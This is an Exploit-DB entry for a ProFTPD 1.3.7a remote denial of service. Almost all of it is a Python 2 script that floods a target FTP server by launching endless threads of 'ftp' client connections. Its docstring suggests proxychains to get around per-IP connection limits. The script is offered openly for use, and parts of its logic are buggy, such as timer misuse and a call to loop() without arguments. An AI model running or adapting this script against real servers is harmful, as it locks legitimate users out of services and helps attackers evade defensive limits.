ProFTPD 1.3.7a - Remote Denial of Service

EDB-ID:

49697

CVE:

N/A


Author:

xynmaps

Type:

dos


Platform:

Multiple

Date:

2021-03-22


# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service
# Date: 22/03/2021
# Exploit Author: xynmaps
# Vendor Homepage: http://www.proftpd.org/
# Software Link: https://github.com/proftpd/proftpd
# Version: 1.3.7a
# Tested on: Parrot Security OS 5.9.0

#-------------------------------#

#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#ProFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""

import socket
import sys
import threading
import subprocess
import time

banner = """
._________________.
|      ProFTPD    |
|       D o S     |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|

"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])

def test(t,p):
	s = socket.socket()
	s.settimeout(10)
	try:
		s.connect((t, p))
		response = s.recv(65535)
		s.close()
		return 0
	except socket.error:
		print("Port {} is not open, please specify a port that is open.".format(p))
		sys.exit()
def attack(targ, po, id):
	try:
		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
		#print("Worker {} running".format(id))
	except OSError: pass
def main():
	global target, port, start
	print banner
	try:
		target = sys.argv[1]
	except:
		print usage
		sys.exit()
	try:
		port = int(sys.argv[2])
	except:
		port = 21
	try:
		conns = int(sys.argv[3])
	except:
		conns = 50
	print("[!] Testing if {0}:{1} is open".format(target, port))
	test(target, port)
	print("[+] Port {} open, starting attack...".format(port))
	time.sleep(2)
	print("[+] Attack started on {0}:{1}!".format(target, port))
	def loop(target, port, conns):
		global start
		threading.Thread(target=timer).start()
		while 1:
			for i in range(1, conns + 3):
				t = threading.Thread(target=attack, args=(target,port,i,))
				t.start()
				if i > conns + 2:
					t.join()
					break
					loop()

	t = threading.Thread(target=loop, args=(target, port, conns,))
	t.start()

def timer():
        start = time.time()
        while 1:
                if start < time.time() + float(900): pass
                else:
                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                        t = threading.Thread(target=loop, args=(target, port,))
			t.start()
                        break

main()